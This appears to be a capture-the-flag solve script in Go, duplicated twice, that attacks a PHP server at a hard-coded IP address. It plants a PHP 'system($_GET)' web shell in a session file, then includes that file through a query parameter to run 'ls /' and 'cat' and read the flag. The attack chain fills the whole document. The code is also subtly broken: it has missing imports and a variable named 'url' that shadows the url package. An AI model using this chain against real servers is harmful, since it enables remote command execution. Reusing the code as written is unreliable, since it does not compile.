Aviksaikat/get_flag.go

## get_flag.go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"regexp"
)

var (
	client   = &http.Client{}
	url      = "http://44.200.237.73/"
	payload  = "?karma=%3C%3Fphp+system%28%24_GET%5B%27jadu%27%5D%29%3B+%3F%3E"
	cmdRegex = regexp.MustCompile("FLAG{.*}")
)

func sendPayload() error {
	_, err := client.Get(url + payload)
	if err != nil {
		return err
	}
	return nil
}

func executeCommand(cookie string, cmd string) (string, error) {
	parameters := url.Values{}
	parameters.Add("karma", fmt.Sprintf("/tmp/sess_%s", cookie))
	if cmd != "" {
		parameters.Add("jadu", cmd)
	}

	req, err := http.NewRequest("GET", url+"?"+parameters.Encode(), nil)
	if err != nil {
		return "", err
	}

	res, err := client.Do(req)
	if err != nil {
		return "", err
	}
	defer res.Body.Close()

	buf := new(bytes.Buffer)
	buf.ReadFrom(res.Body)
	response := buf.String()

	return response, nil
}

func main() {
	res, err := client.Get(url)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	cookie := res.Cookies()[0]

	_, err = executeCommand(cookie.Value, "")
	if err != nil {
		fmt.Println(err)
		return
	}

	err = sendPayload()
	if err != nil {
		fmt.Println(err)
		return
	}

	response, err := executeCommand(cookie.Value, "ls /")
	if err != nil {
		fmt.Println(err)
		return
	}

	file := cmdRegex.FindString(response)
	if file == "" {
		fmt.Println("Oops something wrong no output found!!")
		return
	}

	err = sendPayload()
	if err != nil {
		fmt.Println(err)
		return
	}

	response, err = executeCommand(cookie.Value, fmt.Sprintf("cat /%s", file))
	if err != nil {
		fmt.Println(err)
		return
	}

	msg := strings.Split(response, ":")[1]
	fmt.Println(msg)

	flag := cmdRegex.FindString(msg)
	fmt.Println("\nFlag: " + flag)
}
	package main

	import (
	"fmt"
	"net/http"
	"net/url"
	"regexp"
	)

	var (
	client = &http.Client{}
	url = "http://44.200.237.73/"
	payload = "?karma=%3C%3Fphp+system%28%24_GET%5B%27jadu%27%5D%29%3B+%3F%3E"
	cmdRegex = regexp.MustCompile("FLAG{.*}")
	)

	func sendPayload() error {
	_, err := client.Get(url + payload)
	if err != nil {
	return err
	}
	return nil
	}

	func executeCommand(cookie string, cmd string) (string, error) {
	parameters := url.Values{}
	parameters.Add("karma", fmt.Sprintf("/tmp/sess_%s", cookie))
	if cmd != "" {
	parameters.Add("jadu", cmd)
	}

	req, err := http.NewRequest("GET", url+"?"+parameters.Encode(), nil)
	if err != nil {
	return "", err
	}

	res, err := client.Do(req)
	if err != nil {
	return "", err
	}
	defer res.Body.Close()

	buf := new(bytes.Buffer)
	buf.ReadFrom(res.Body)
	response := buf.String()

	return response, nil
	}

	func main() {
	res, err := client.Get(url)
	if err != nil {
	fmt.Println(err)
	return
	}
	defer res.Body.Close()

	cookie := res.Cookies()[0]

	_, err = executeCommand(cookie.Value, "")
	if err != nil {
	fmt.Println(err)
	return
	}

	err = sendPayload()
	if err != nil {
	fmt.Println(err)
	return
	}

	response, err := executeCommand(cookie.Value, "ls /")
	if err != nil {
	fmt.Println(err)
	return
	}

	file := cmdRegex.FindString(response)
	if file == "" {
	fmt.Println("Oops something wrong no output found!!")
	return
	}

	err = sendPayload()
	if err != nil {
	fmt.Println(err)
	return
	}

	response, err = executeCommand(cookie.Value, fmt.Sprintf("cat /%s", file))
	if err != nil {
	fmt.Println(err)
	return
	}

	msg := strings.Split(response, ":")[1]
	fmt.Println(msg)

	flag := cmdRegex.FindString(msg)
	fmt.Println("\nFlag: " + flag)
	}